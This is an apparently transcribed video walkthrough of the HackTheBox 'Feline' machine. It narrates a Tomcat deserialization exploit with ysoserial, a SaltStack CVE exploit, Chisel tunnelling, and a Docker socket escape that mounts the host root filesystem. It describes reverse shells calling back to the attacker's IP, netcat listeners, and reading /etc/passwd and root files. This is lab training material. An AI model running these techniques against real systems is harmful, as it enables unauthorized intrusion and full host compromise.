Happy Saturday, welcome back. This is Justin from Parity InfoSec, and I gotta tell you, this box Feline was a beast. This one, while simple in terms of tools, just understanding what was going on took a little bit of work. Luckily, there are a few POCs that are out there and available, and I'm gonna go ahead and leverage those. I'm not gonna waste a whole lot of time, but we're gonna go over some Tomcat Deserialization RCE. That's going to be using Ysoserial, so I will definitely highlight that. Know this if you're trying to go for AWAE, if you're going for offensive securities web pen testing certs, that one's definitely a killer to know. Got to know Ysoserial. And then we'll move on to CVE for SaltStack. It's going to be a pretty simple ready-made to get you into the box. Now that's going to be a little bit tricky because it's not a real root that we're going to get, because we're going to be sitting inside of a Docker. So we'll go through a few things. I'll show you a little bit about Docker Unix sockets. Kind of a different technology for me to deal with, so I'll talk to it a little bit and then show you a few things that we can use curl to do. And just as the icing on the cake, I want to talk about Chisel. So Chisel port forwarding is key if you're doing any kind of network pen test. Usually you're not going to need it. I put OSCP on here, but it's not really for OSCP, but the lab, the PWK portion. We're hopping through a couple different networks or different boundaries. So in this one, the boundary we're going to be hopping through is the Docker socket. So you're going to kind of be jumping between multiple Dockers, and it's going to be a Docker inside of a Docker. So the easiest way for me was to just drop a Chisel port forward into place and go right through it, and we'll be able to execute code straight from our box onto the target box. That pretty much covers everything, but this one's going to take a little while, so let's get started. All right, let's rock and roll. We're going to hit it with an NMap. So this box was 10.10.10.205. This box was almost 6 months ago now. So going back through my notes, I forgot how painful this box was. 205 is still a pretty high number. So it's not too old, but man, it's been a while. So we'll go ahead and get that started. And 205 comes back with 2 ports, 22 and 8080. And we're gonna do some versions and scripts real quick, but I wanna just limit it to what we have. I'll do 22, even though we know it's gonna be SSH, not a big deal. The real one we wanna learn about is 8080. So in this case, 8080, it says HTTP proxy, but it's really going to be running a website on Apache Tomcat 9.0.27. You'll find that right here. That website is going to be called Virus Bucket. So not necessarily a proxy, it's just going to be served up on Apache Tomcat. And that's really just a part of the way that NMap works. So it's a great place to start. So let's go over to our Firefox. I will start off without using the proxy, and then I'll show you a little bit here where we start intercepting the request. So 10.10.10.205, and I forgot to put 8080 on there real quick. Just does not like me today. So there we go. Okay. Make that big here real quick. 10.10.10.205.8080 comes up with a site called Virus Bucket. Virus Bucket is malware analysis testing platform. It's got to read more, but it's just going to be a null link, as is Virus Bucket. Home. Service is a good link, and blog is not. So let's go to service. And service takes us here. It says fishy email attachments, coworkers' suspicious documents, your kids' video games. We got it all covered. Virus Bucket allows all kinds of files and runs various tests to determine their nature and interaction. Now it gives us the option to put in an email, a sample, and analyze over here. So we will just go ahead and say info@parityinfosec.com. Sample. Can't type anything in. You can click on it, and it does allow you to upload something. So I'll just upload a README and click Analyze. And it says upload successful. The report will be sent via email. Well, we don't have to worry about that. We're not going to get a report. what else can we upload? Let's go ahead and go to my HTML. Lots of stuff in here. Let's upload a GIF. And it doesn't seem to care for that. So, you know, I'll always try mine.php, which is just a simple PHP tool. Either way, we don't know where this is going necessarily. So we need to get a little bit of information. And one key way to do that is to just do it through burp and intercept it. With that, let's go ahead and start up our burp and turn our proxy on. So I'm gonna go ahead, I'm gonna leave intercept on because I wanna just grab this first one that we do my PHP, hit analyze, and it shows up right here. So here is all the information. It's saying form data, name, image, file name. Okay. We'll go ahead and right click this and just say do intercept a response, and we're gonna forward it. And the response we got was file uploaded successfully, 200. Doesn't give us a lot of information. So let's see what we can do with this packet. I'll take this packet that we got, send it to the repeater. This is the nice new version of Burpsuite. So let's try taking the name out and sending it. So when you send that, you actually get this big error message back, and it's a Java file not found exception. I want you to take a look at this because it's saying this is a directory, so it's giving us a little bit of information. You're gonna need this for what we're about to do, but it's saying they didn't find the file in opt samples uploads. So opt samples uploads is where it's dropping these files. So it's important to know that. And then we'll go ahead and take a look at some of this file stream information. So I think I can go a little bit bigger here. So here we go. When we look through this, it is showing that it's JSP, so it's using some Java, and it's bringing it in, it's doing some filtering, it's invoking some commands. Not a lot of information, but you know that there's something going on with Java. There is an op samples uploads folder. Let's go back to our request, see if there's anything in there. Nothing really sticks out, but we do know that from this our Apache 9027 comes up. So let's go ahead and copy that, and we'll go just Google that. So Google that stuff. That's what I'm going to start calling this because it's really the easiest way to do it. So exploit. Go ahead and turn our burp off real quick. I don't have my certificates in, so it's just not set up right. If you have a chance, go ahead and put the certificates in. And the first thing comes up is Red Timmy, and he's saying there's an Apache Tomcat RCE by Deserialization. It's a CVE 2020-9484. And it comes along with all these other sites that say 9027. What you're going to see, we'll go ahead and click on this. And this is his write-up. It's really nice, but it's talking about there's actually a lot. So in the 10 series, it's anything under this. In the 9 series, it's anything 9035 and below. You've got your version 8 and your version 7. Anything released before April 2020, basically. And it does say there are a couple prerequisites that need to be met. And that is that the persistent manager is enabled and it's using a file store. Now there's some information down here on how to check it. Honestly, everything it says to do in here does not exist in the error messages that we're getting. So it's a little cryptic. I really wish it was a little bit easier to track down. But he does go into the exploit. And so he starts talking about curl. So there's different ways you do it. So curl we can do it in burp. So there's 2 different methods. I'm going to talk about both. Essentially, you just go in and you change your session ID, and it'll check in the memory if it exists. If it doesn't, it's going to go through and try and make a persistent session. It'll check in another location and evaluate that as a .session file. If the file exists, it will deserialize it and parse it. So anytime you're talking about serialize, deserialize, you're going to really start getting into Ysoserial. So we'll start by how can we approach this and how can we look at this, and then we'll go into the actual deserialization. Using Burpsuite, I showed you that if we go to file name, we get an error. So I'm going to go ahead and put this file name back in. So this one was mine.php. And I will go back to side by side. When I go side by side and I send it, it says file uploaded successfully. If I come over here and I say ... and they just went after a file. And we'll just say etc password. When I do that, it is still going to say file uploaded. If I take this back out, it is still going to give me an error. So there's a lot of checks that they give you, but it just doesn't seem to work out in my mind. So it's just important to know that. And you can do the same thing in curl. So we'll clean this up, say curl. For this one, we'll go back to that page. It's going to say you're going to curl, I guess it was in the image. So you're going to curl the website index.jsp. For starters, there's not an index.jsp. There's a service, and then give it the cookie. So I really wish they had all the text here so I wouldn't have to type this out. But we'll go ahead and say curl, and then HTTP 10.10.10.205, and then we will say service for this one. Just double check. That's what it is. So, oh, 8080. It's critical. So drop 8080 service slash, we'll close that out. Yeah. So there's the website, and then give it the header cookie JSession ID. So I'll say h cookie equals colon space, and then I can pull this information out of burp real quick, probably just as easy. So we'll pull that right there, drop it in, and then give it a single quote to close it out, and we'll just double check that that's everything that was in there. They did say user local Tomcat Groovy. We could try that. I don't think I actually got anything out of that one. So user local Tomcat Groovy. And we go ahead and pull that down, and it gives us the same website we always get. Again, because there's not really an index. So if you come up here, you just try to give it index.jsp. I don't believe it's going to work because it's not a normal file. It's just going to come back and say 404 file not found, which you see right there. So this is what made this box so hard, is really trying to dig in. And this is almost a shot in the dark. You know that it is running Tomcat, that is vulnerable, and we're going to take a stab at it. So if we come in here and we look for, I think Red Timmy had an exploit. There's a quick exploit right here for 2020-9484. And it tells you to just curl this website with a session ID. And again, it's a POC. But that's not going to get us the actual remote code execution. So to do that, we're going to use a script that I found from Anjay on GitHub. Again, you can write your own, but this one was super easy. It's right here. It's just going to ask you every time to enter your IP, your port, your IP, your port of your target, the uploaded file path, which we know is opt. samples uploads, and it's going to go ahead and reference these. Now, they did hard code in that this is from a HackTheBox using Ysoserial sitting in that .jar file. So we'll have to rename a few things, but let's go ahead and give this a try. I'll pull the raw and just copy and paste, and we'll bring it over to our browser. And make a directory for 205. Oops, 205. And then we will nano the exploit. I'll go ahead and name it 9484. And it is a shell script. So we'll save it like that. So all this looks pretty good. The thing that I need to figure out is where is my copy of Ysoserial. So if you don't have it already, go pull it down from GitHub. There's a lot of information. If you just come in here and you say Ysoserial, it's going to be Frohoff, and that's where all this information resides. It's really cool, but it's integral, especially if you're doing AWAE. There's a whole module on deserialization in Java, and it covers multiple types. It covers multiple operating systems, things like that. So there's all these different payloads that are available. In this one, we're going to go ahead and stick with the most common. This box, while hard, this is not the hardest part of the box. So they kept this one pretty simple, and it's going to be using a version of Common Collections. Not a big deal. I know I already have it on my box, so I'll just open a new tab, and I will say locate Ysoserial. Well, helps to spell right. Serial. Okay. So mine's running in opt Ysoserial. I'm going to be looking for this jar file right here. So I have a copy of it in my normal home directory, and then there's a copy in my opt. So I'll just copy that link, come down here and paste it in. Paste it in. There we go. Okay. So this one POC that's already built already calls out Common Collections 2 as the payload. Everything is in here. You can hard code it. To be honest, this got really frustrating over time because I was hitting the same exploit a couple times because I was kicking myself out of the box and things like that. So if you want to hard code this one, by all means go for it. I'm just going to show you what Anjay made, and we'll run from there. So I'm going to chmod, give it some executable rights, and we'll run it. Now, to do this, I also need to have a listener on my side. So I'll open a new tab, and we'll just do nc nvlp 9999. There it is. Okay, so my IP is 10.10.10 or 10.10 14.3. I'm going to say 9999. We're going to be going up against 10.10.10.205. And the port is going to be that 8080 from the website. Now it's going to ask for that upload a file path, which we know is opt samples uploads. And again, just to show it, we got it from this right here. This information disclosure is key to being able to execute this exploit. So I'll go ahead and run it. And it comes up with a bunch of garbage, but you got to understand it's doing Java deserialization. So it's going to say it uploaded the file, and then when it went to run it, it did try to run it, ran into all these issues. But when you read this code, you will see the persistent manager. So when it was saying you had to have persistent manager, you do see it right here. So it's in this code. This is all just the stack spitting out and just calling it again. The full stack trace of the root cause is available in the server logs. So it says there's a problem. Except when we go here and we see that there's no problem for us. There's a problem for the server, but there's no problem for us because we're now sitting as Tomcat on Virus Bucket. I'm gonna go ahead and look at this file. There's nothing significant in the opt. If I go to home directory, I'm gonna see cat user.txt, and we have user. So crazy, we're done. Less than 20 minutes, we're into user. Not the hard part of this box. This one was definitely from user to root is where they had the hardest problems. I'm pulling up the HackTheBox site right now, and you can see there were almost 2,400 user owns, and the system owns is actually under 2,000. So it's a pretty low box. A lot of people had problems with this one. So no worries if you weren't able to get it, but please follow along. Hit that subscribe button if you like this. Let's start moving towards exploiting and privilege escalation up to root. So as user 1 Tomcat, I like to always go over dev SHM. I'm gonna go ahead and come over here. I am good with this. If I have to re-execute, it'll be there, but let's go ahead and go to var www html, and I will do my sudo python 3. I'm going to tell it to run this module http.server on 80, and we'll be able to start serving our information out. So wget 10.10.14.3, and I will bring over Linpeas. Anybody that's seen me before knows I love Linpeas. I like the entire Peas escalation suite. So there's a MacPeas, Linpeas, WinPeas. WinPeas actually just hit version 2 this week. So go ahead and check it out. There's some extra features that they added in there. A lot of really good programming that was done by a C# folk. So not so much shell, but let's go ahead and take a look at this Linpeas. Everything we got to do, we've got to make sure that we add executable rights to it. So linpeas.sh, and then let's run it. We'll see our nice little P guy, and we'll let it start loading up. So Linpeas is not going to give us a ton of information about privilege escalation, but what it is going to do is kind of give us an idea of what's going on with this box so that we can start thinking about some other things that are going on. You'll see we are user ID Tomcat, no extra groups, so nothing that we can do there. It's running 20.04 of Ubuntu, nothing crazy there. I'm going to come down to a section in here. We start looking at some of the ports. I think that's going to be the first thing that matters to us. There's a couple of references there. There is some dbus objects. That'll kind of matter here in a minute. But virus bucket, when we start looking at the IPs, there's localhost and there's a Ubuntu virus host 127.0.0.1, 127.0.1.1. None of those are the IP that we're looking at. So 10.10.10.205 is not this box. That's the first indicator that we are sitting inside a container, usually a Docker container. So we'll keep going down and taking a look. We see this nasty address, 172.18.01. That's usually an indicator. This one right here, Docker 0. So we are definitely sitting inside of a Docker. There is a 10.10.10.205, so it's not such a big deal. But all these other flags kind of popped up to tell me we're dealing with a Docker. This is not the end of the road by any means. We do know there's some IP table rules, and we're going to get into that. And then in the ports, we start to see things like 4505, 4506. There is an 8000 listening. So these are all things that we can take a look at because they're limited to the 127.0.0.1. We couldn't see them from the outside. Now that we're inside, we can take a look. And we can keep going down here. There are a couple of users, so root Tomcat, but no other additional 1,000 plus users. There's nobody that we have to pivot to on this box that we're looking for. There's nothing significant in terms of username and password that are available. We're actually not even able to SSH into this box because it doesn't have any credentials. We're going to be locked out there. And we'll just keep going down. We did get the user.txt. It does say there's a .bash history, so we'll take a look at that just to see. There's a couple access logs. That information is going to be us accessing the box. Not a huge deal. But we've already kind of talked. We got in through the Java deserialization issue. We could have done that manually. When you go to AWAE, you've got to make those scripts yourself. So I just wanted to show that it is a trick. I'm not going to get into the nitty gritty because there's so much other stuff to get into. But we did see that there were some ports. So I'll just bring this up real quick. Netstat antup, pantu, whatever you want to call it. We have these strange services. I don't really know what's sitting on 8,000. We can try and do an NC localhost 8,000. Maybe it's a get. So get 1.1 HTTP. And it just kind of dies out. So we don't really know what 8,000 is. But let's go ahead and take a look at 4505 and 4506 if we just look online. And if you look, it's going to reference this thing called SaltStack. So it is a firewall, and it does all its communication over ports 4505, 4506. Never seen this firewall, so we can look at some of the SaltStack documentation. Not critical to what we're about to do, but it's just talking about that there's a master and then minions. So there's some kind of master firewall with multiple minions. So it really works out well for Dockers. And it's able to kind of push information back and forth. So we want to talk to that, and we need to get access to it. Normally I would run SSH port forwarding to get access to this box. But it didn't want to work so well because we're sitting in a Docker. It just would not seem to connect. I have a bad shell, so the shell's not even strong enough. I can try and tweak some stuff. But the easy answer was Chisel. So I want to talk about Chisel for a minute. 0xDF did a great write-up. I'm gonna tap my foot, pound on the table. This is what I've been looking at a lot when I was trying to finish out DANTE recently. For anybody that wants to do HackTheBox Pro Lab, DANTE, this came up. So OXDF and Chisel. Now this tunneling with Chisel and SSF document was great. It's going to go into serious multi-hop pivots, and this is what you need to understand if you're going into the PWK or DANTE labs. You're going to have to kind of pivot through. You're going to have multiple pivots. I think at one point I had 3 pivots, and that included some SSH shuttle links. You're going to be dropping Chisel through a Chisel. It gets really complicated, but for this one, I just want to go up and hit the basics at the top, because this is how you're going to use it. You're going to use it as a server, and then you're going to run these commands. And this is just a simple remote port forward. So in this one, it's going to port forward 80 to 127.0.0.180. So that's the basic concept of what we're going to do. I'll go ahead and open up a new tab here. I do have Chisel installed. Maybe. I do not have Chisel installed. I had it installed. I reset my box on this one. So I don't even want to do that, because the real answer was if you come in here and you just search for Chisel Linux, whatever. Because obviously you're going to get a lot of information if you just say Chisel. there is a link in here to the binaries. So you want to come into this GitHub and pull down the latest release of binaries. I tried this. I'll be honest, this didn't work because I was running as normal user, and if you do sudo, it'll sudo the first part, but not the second. So if I do this, it's gonna come back, put my password in, it'll pull it down, and then it'll say can't move it to the right spot. So here I just did a su. Su dash. That's weird. There we go. We'll just do that. Sudo su, and I'm root. Now if I run this command, it's going to be able to do everything. So it just drops it in, and then it's in the user local bin chisel. So if I exit out here and I just say chisel, it's now going to pull it up, and it's going to give me the option to run as either server or client. I'm going to pull the exact code here because I enjoyed this. Just basic settings work great for me. So we're going to say chisel server. I'm going to open up port 8000 on my box to serve as the reverse for anything coming in. Oh, so it's trying to put it in that file just in general. So now it's listening on 8000. I need to get this onto the box. The best way for me to do this is I'll come back here to this spot. We'll go ahead and stop this, and I'll just say locate chisel. And I have an exe version that I use a lot for Windows boxes. We'll go ahead. I guess I did have a copy in my home directory, so I will copy this. So sudo cp. I'm going to copy that into here, and now I have a copy of Chisel for Linux. I come back over here and say wget 10.10.14.3 Chisel. Oh, got to start my server back up now that I move that file in, and pulled it down just fine. So if I say .chisel, I still need to chmod it. And then if I say .chisel, it's going to come back here and say the same thing. And this time I want to run it in client mode. So the best way to run it in client mode is to come here. But remember, we're going to need to change the ports on here. So for this, we're going to use port 4506. And I'll just do 4506, 127.0.0.1, 4506. For this box, I do need to do // because that's where it's sitting, and it's not in the path for Linux. And you'll see that it went ahead and it connected to my box, and it's saying connected. So it does a really good job. When this has dropped off for me in the past, the chisel is actually sitting there and it will relaunch. So it's been really cool. You come over here and you can see that it is catching 4506 and it's running as a tunnel proxy. So let's zoom this in real quick. And if I do a netstat, we will see that we are running a, should see it. So we are running 4506. It does attribute it to Chisel, but it's not the Chisel port. That would be 8000, which also says Chisel. But 4506 is what we're going to need. All right, so we've kind of forwarded that port back to us so we can take a look at it. But we didn't really go find the RCE for this one. So let's go ahead and back up a second. We can say 4506 SaltStack exploit. Google that stuff. So you get a couple different things here. There's a SaltStack 3000.1 RCE. There's an article right here that's going to talk about you need to add restriction to those ports, but for us, this is the kind of stuff that we're looking at. 2020 11.651. I'll go with the one from Exploit DB, but this one looks like a good one as well, so don't discount it. So this one is going to ask for very little, to be honest. This one, because we already know we're going to run 127.0.0.1 as our IP because we've forwarded back to ourselves, it's going to do a similar thing. It's going to drop a path. It's going to look for a key and pull down that key and hopefully be able to do all this stuff. Here's some of the options that you have available. You can set the port and the IP, but like I said, it's going to default to 127.0.0.1 You can set all this stuff or leave it alone, but what we're going to focus on is the read function. So we're going to be able to read files. I didn't mess around with upload or download or anything like that, the upload source, upload destination. I just went ahead and used native tools. So in this case, I will run just an execution. So the execution is going to run a command on the master, and then you have execute all and run it on all the minions. This one, it's not such a big deal because there's only one minion that's running. But we'll go ahead and bring this down into our box. So we'll go up to the top. And I'm actually going to pull it down in raw, copy and paste. So we're sitting in the right box. Let's go ahead and call this 11.651.sh. As I sit and I think about this one, the biggest bummer is that I can't read. If I go ahead and I say nano to the 11651, and I called it a shell, but it's actually a Python. So that's my bad. We'll go ahead and move this to this, and we'll call it Python. And I will just say Python. And this one I believe is a Python 3. So the first issue that we should have encountered was this, which is there's no module named salt. And that one's simply fixed with a pip3 install salt. And let that run. So now that everything's installed, let's try that one more time. Pip3 11.651 pi. All right, so it's going to say, please only use the script to verify you have correctly patched systems you have access to. And it does come back and it says we're running salt version 3002.2. But it didn't actually go against our box. No, I think if you run this, yeah, that's just not going to run. So we should be seeing it go up against the system of choice. Not sure why it's not working. It liked me earlier, but we're going to go ahead and take a look at a different version from F-Secure Labs and Jasper LA. Jasperla. That was the one that I ended up really using. So Jasper LA. This is another exploit. I'll go ahead and run this one and just do a git clone. So cd opt sudo git clone this. We'll go into that directory 2020 PLC. There's an exploit in there, so let's try Python 3 exploit. So it kind of said the same thing as the last one. Use the script to verify your patch systems, but now it's saying check the salt master, and it says it does see it, it's online. And it says checking if vulnerable. Yes, it is. And then it pulls down the root key. So it's successful at accessing this as root, kind of. So let's try some of the commands. One is R for read, and then I'm going to say read etc password. That really tells me if it's working or not. And sure enough, it pulled down the etc password. So big win there. We can read files. Let's see if we can jump to a conclusion and just read root, right? So root.txt. And it gets through here and it comes back with this, which is list index out of range. If anybody that's done programming before, you understand that means usually that nothing existed. This is a faulty non-catch of an error. So it's a negative number or it's outside the range. So what this really is telling us is there is no file named root.root or root/root.txt. So that's not where we're going to find our final root, but it is going to be a jumping off point. I had some issues with this one because I didn't necessarily know where to go, because I wanted to run code. I wanted to run commands. One of the things I usually love to do is give me an ls, tell me what's in the directory. So here you can run executables. So if you say ls lar root and you run it, it's going to run it. But what you're going to see is it's going to attempt to execute, and then it's going to say successfully scheduled job, and you have nothing to show for it. There's nothing to point at. You're not going to get an actual output. So for this one, what I ended up doing was a little crafty, is you do the ls and then pipe it out to temp root.ls. This is just me saying, do this command, put it into a file, and I'm going to run it. So it ran the command. Now I just come back to here where I can read a file, and I'm going to say go to temp root.ls. And I'm able to read that list file. It's a little workaround, but it works. We do have some files here. There's an SSH file. There's a todo.txt. There's also a bash history file, which is not being piped dev null. So we'll take a look at all those things. So let's start with looking at our our todo.txt. So this is what the file actually reads. It says add SaltStack support to auto spawn sandbox dockers through events, and then integrate changes to Tomcat and make the service open to the public. So it's really talking about SaltStack and sandbox dockers, which means running a new Docker for every instance or every event and being able to just spawn and go. So we'll look at that a little bit later. It doesn't tell us a whole lot on how we're going to pivot into this box. We'll go ahead and look at the bash history. And we don't want to forget this is .bash. It's a hidden file. So we'll go up to the top, password, get host, go into SSH, and then this is making that to-do file, read the to-do file, make the to-do file, read the to-do file. So nothing really fancy there. Go into home Tomcat, cat etc password, exit. Here's our todo.txt. Then there's a var run, and then there's this command, which is curl s Unix socket Docker.sock images JSON. So not 100% sure what that is in this context right now. So we need to get onto this box. There's a couple ways that you can go about getting onto a box. Sometimes you'll just put NC on there. NC running netcat didn't work a whole lot. There's a lot of different commands you can run. If I try to run execute and just put in one of our handy dandy reverse shells, I'm going to go to pen test monkey. So Oh, that was working earlier. Oh, it looks like his website might be down. So we'll just do a bash reverse shell. We'll go to payload all the things. That'll work. So bash TCP, this is what it looks like. We'll go ahead and paste that in here and change our information to 10.10.14.3. And we will run this shell on 8888. Go ahead and open a new tab, nc ndlp 8888. There we are. So when I run this, it's going to go ahead and run it, and it's going to say attempting to execute and successfully scheduled job. That's all it tells me. If I come over here, this is not going to run. And you could beat your head against the wall for days trying to get this to run, and it's just never going to run. This, you kind of run into this a little bit with PowerShell. You kind of got to run a bash of a bash. So here we're going to say, I think I can run this as a double quote. So we'll run a double quote bash, and then I want you to run a command, single quote, double quote. So I want you to run a shell and run this command, which is a shell command. I go ahead and hit enter, let it run, and that one didn't post, so I might not be able to do double single on that, but I know that I can do single double. So double single, single double, we'll try that. And we have a shell. So it's just one of those quirks. I got stuck on that for hours trying to find the right reverse shell to run, and it just ended up being a case. And you run into that a lot with Windows, where you have to run a command /C and then run the command you want to run, which could be a PowerShell, which is running another script inside of it. So you got to kind of layer. And we're going to see a little bit of that more here in a minute. But for right now, we got into root. If I do an ls, there's our to-do file. There's the bash history, the to-do, but it didn't get me what I wanted. How about SSH? We go on that file, and there is nothing. So we are stuck good. But let's look at that bash history again, because there was an interesting command in there. This command is going to cat, and then we'll run it from here. Okay, so this is going to be pushing a curl command through a Docker.sock to a site. So let's start by seeing what it does. So this is coming back and it's saying containers is created then. Here's an ID information, label, parent ID, repo tags. It's calling this one sandbox. So it's good information to keep in mind, as this is called sandbox and it's the latest version of the repo. Talks a little bit about the sizing, that kind of information, goes into another container, another ID, same kind of information with no repo tags. So we know this is looking at the images that are available for Docker. What have I said twice already now? Google that stuff. So let's say Docker.sock exploit. If you don't know, Google it. So Dejan made this really cool write-up about the danger of exposing Docker.sock. And this is exactly what it's pointing to, which is var run Docker.sock. And he says it could lead to a full environment takeover. I like that. That sounds good. So it talks a little bit about non-network Unix socks. It's supposed to be a safe and secure way to talk between a Docker to a host operating system. And when you layer on things like firewall on top of that, this should be super isolated. But what if it's not? Now we can't run any of these commands because these commands are set up to be run from the host system. Right now we're not able to run a command on the host system, but we are able to run the Docker API because right now this is what we've been running. So we didn't run containers, so let's take a look at that. We ran images. So if we copy this command, we say containers/JSON, we get a whole new list. So this is going to give us an ID of the container, which is an instance of the image. This one is called SaltStack. Even though it's the sandbox image, it's running with the name of SaltStack. It is talking about being on ports 4505, 4506. That's where the communication is taking place. There is a private port, public port for 8000, so there is communication going back and forth through port 8000. All that kind of information is going to come in handy, but it's just saying that this is its own thing. There is an option here to put in a command. So this one was dumb initialization, run this script. So I'm not super skilled at Docker. Everything I've learned has been through HackTheBox. It's a great way to learn this stuff. So we got to figure out how we're going to use this information. See what else Dejan tells us. So we did this, we got the containers, and this is what it looks like when it's pretty. And then it gives you the option to create an executable instance. So you're going to create an exec instance, execute something on the container. To do that, this has to be a container that is currently running. So you need to be able to point to a container that's running. We have our container, it's running, and this is the command. And this is just going to go ahead and print out etc password for this container. Go ahead and copy it because it's an easy command to run. Didn't like that. That's mostly because I run my commands from my own Windows host system environment. Copy and paste from there, but I'll go ahead and do it from here. All right. So we'll paste it into Genie. We know we want to run all this information. That was weird. The only thing that we got to change is this, and we don't care about the port necessarily. This is all going to be localhost. But we do need to bring in that command for the Unix. So we'll pull in Unix socket Docker.sock. And we'll put it right here. Now we can just copy and paste. And it ran it, said no file or directory. Oh, I was supposed to give it a container. So that was my bad. So there is a container piece of information right here, and that's to run an executable. So in order to run that, we have to have a container. Like I said, it has to be running. So this is going to be our container information. So when we said, give me the localhost containers JSON, this is the only one that came back. Yeah. That is the only one that came back. So we'll go ahead and copy and paste this. And this is the salt system, obviously, we were just talking about. And I will paste it in here, put a slash in there. And then when we paste it in this time, oh, I have a little bracket there that I forgot to take out. All these little typos add up after a while. This box was devilish when it came to things like that. So what this did is it created an executable execution, and it's going to say created, and then it's going to give me this ID. So when you look at the write-up, it's expecting that. So it's going to create it, give it an ID. Now you need to start it to run it. So it's kind of queued it up, and now we just need to run. And to run it, you need to know the idea of that executable. So this will be another one that we're going to bring over here. I'll go ahead and paste it its own document. And then we need to find this. When I paste that in here, didn't like that either. Oh, just let it go back and change this. So this one is going to go back to localhost as well. So it ran it, said started. If we come over here, it should have kicked it all out. So there might have been another little typo in there. We'll go ahead and start it from the top because it's just easier to run it like that. And because I have it in Genie, this is the request saying post and make an executable. So copy it, paste it in. This is our new container ID because it is on a bit of a timetable. Come in here. We will paste in the new container ID, copy, and not sure why that one didn't work. I am absolutely certain why that did not work. And this is just the difficulty of this box. You have to make sure to put this Docker.sock on here. So make sure we put this on the front of both commands. And I will tell you, I really tried to run this as a Python script, but it does not work well for Python. All right, so that time we ran it, when we got the Docker. There is no real way to interface with Unix sockets unless you run a separate module, and that module is not available in these different Dockers. So I just didn't mess with it. Curl has it built in now. So Curl's able to run these sockets, and now we've got this new wonderfulness. And we got our Etsy password. Now, is it gonna work if we try to do root? Let's go ahead and try cat. And then we'll say root.txt. Give us a new container ID. We'll go ahead and pull that again. Copy. Drop it in here. The problem is it's going to say there's no root.txt because what it's doing is it's reaching into this Docker container. And we already know there's no root.txt. What you have to do is similar, and this is where it starts to get into that information. If you come down here and it says bonus taking over the host, it's going to say you have to start a Docker container with the root of the host mounted to a volume on the container to allow the commands to be executed against the host file system. This allows you to get full control of the API, run the Docker host. So essentially, it steps you through the process of doing a containers create with bin bash as the entry point and setting up a host OS volume, and that's going to bind to /host OS. And then you're going to start that container. So that's one way of going about this. So now we have to figure out how to, I guess, operationalize this one. And I ran into a beast of a problem here as well. We can pull an Etsy password from the current environment, but now we need to kind of change root. And I want to show you the GTFO bins, kind of write up on that real quick, just in case you aren't familiar with the concept. True. So maybe that's not the right place to look. So we'll just do a true exploit. And that's how to break out. This is a really cool one. I will tell you right now, if you've never seen this before, kind of take a look at this write-up. They talk a little bit about some of the different things. If you're sitting in this, you can write a C program to kind of break out of that. And it just pushes the program to make a new directory. You're going to change the root to that directory. And then with some of these other ones, you're going to compile it. And when you compile it, you're going to mount everything into that changed directory. So it's all about the mount points. And that is what we're going to do for this. But it's a little complicated because it's all about syntax. Syntax is a beast on this one. So let's see if we can script some of it out. So we'll type it in here for right now. So we'll run it on the box. So they've got Python, but like I said, Python's not really going to work for some of this Unix socket stuff. So we got to run a bash. We'll just run a quick bin bash, and then we'll go ahead and start making some basic stuff. So shell, our shell is already, it's defined back here on this. This is the shell I want to run. So we'll copy and paste this into our Genie. So I will change this to 7, 7, well, I like to run 5555. This will be my last one. So 5555, that's going to be my shell. To run the payload, we already know that the shell needs to go inside of another bash running it. So payload is going to be bin bash C, and then yeah, and then we'll run shell. So that's essentially what it's going to look like inside of it. But for this payload, it's going to be run as a post request. So we have to put it into JSON formatting. So there's a few things that are going to run into. So let's go ahead and run it as an array of items. So the payload is going to be broken up by quotes and then a comma between arguments. So we'll run one there, and then we'll run one here. And honestly, we don't need one here because this is a variable, and then we'll put it inside of brackets because it's an array of items. Cool. To run this, the way we're going to try and pass it, I think we're going to have to escape everything. And honestly, to run it the way that we were running before, this should be like this. But if you're familiar with escaping, that escapes that, but we actually have to add doubles to escape that. So that should, 3 slashes and a double quote should break down to a single slash and a double quote when it's all said and done. We'll encapsulate this inside of some more double quotes. This is where it got really confusing, and you just got to make sure to double check all your quotes, make sure everything's good. Everything inside the first set of double quotes is going to need an escape character, so that's going to be that slash. So backslash quote, backslash quote, backslash quote. Now we had talked about root, so we will run that here. So we will change root to just a single mount point. And then we'll run a shell with another command, which is going to be the payload inside of the payload inside of the payload. It's like 3 levels deep right now. I know this looks a little confusing, but just make sure to follow along with, it's going to have an open and a close quote, and then it's going to kind of do its own thing. Escape quote, escape quote, escape, escape, escape. And then here we're going to come down and we're going to have to double escape because it's going to be encapsulated. And you will definitely run into this stuff on AWAE. There's a section where they cover having to double encode stuff. Because if you're running through multiple web servers, it will act differently at each point. So you have to encode it, and it'll try and break it down and then double encode it set. By the time it gets to the second server, it's going to go ahead and process it correctly. So that is looking good for the payload. I think we need one more. So this is going to all be its own thing. And this is going to be the outside. So we are missing a single slash and a quote here. So that now evens out all of our brackets, all of our commands, and we're going to run this as a curl. So we'll go ahead and pull over the commands we've been running. I'll copy the whole thing. Put it down here. So we're going to curl to the unit socket. We're going to post application. The data binary is going to get a little messed up. I'm just going to make it a D, and then it's going to be this information right here. So we will put a double quote here, and then we'll continue to do double exit. So detach is not really an essential item, but what we do need to have is the image. And we talked about this already. The image for this one is going to be sandbox. They've already set it. We've already seen it. Sandbox is it. So comma. And then the way this works is we're going to call this the command. And the command here is going to be the payload, just straight up. When we do this, we do have to bind it. So we'll say binds. And then we'll run another array. And none of this stuff is necessary. So let's go ahead and exit this out. I'm going to put a double here just to get it in, because I know this double is going to coincide with this double. So we'll put it in there. So inside of this, we are going to make an array of back quote, and in between the back quote, we're going to put in /:/mount. So we're going to mount the full directory structure of the operating system into the mount directory. And that's the way we're going to be pivoting around. We're going to tell the host operating system to mount the whole structure to the mount point. So we're going to be able to access everything that's available to the host operating system inside of a Docker. It's not normal. It's not how you do it. This is one of those workarounds. So we're going to say mount, and then we're going to say give it read-write access. And cool. That should be good for that. And then down here, we're going to do localhost containers create. And I don't think this one that we were looking at really went into too much about container create. This is just where it says containers create right here. So you're going to define the container based on all these parameters. You could say here's our entry point of bin bash, here's our host volumes, here's our binds. I'm going to go ahead and run with the sandbox and just the payload. Sandbox payload. This should be a comma. Glad I caught that. That would have drove me nuts. Binds this. We'll go back one. So the payload is this bash inside of this shell inside of this bash, all wrapped up into this command for the Docker to create a new container. And I think that's good. Let's go ahead and copy this and bring it over to the box. The best way for me to do this was to put it here. So I'll exit out of there again, sudo nano, and then we will call this docker.sh. Put that in there and paste this here. Everything looks pretty good. go ahead and close it out, and then I'll start my server back up. I will do an nc ndlp 5555 and just leave that running. And then from here, we'll go to temp, cd temp, and then just do a wget 10.10.14.3 slash, what I 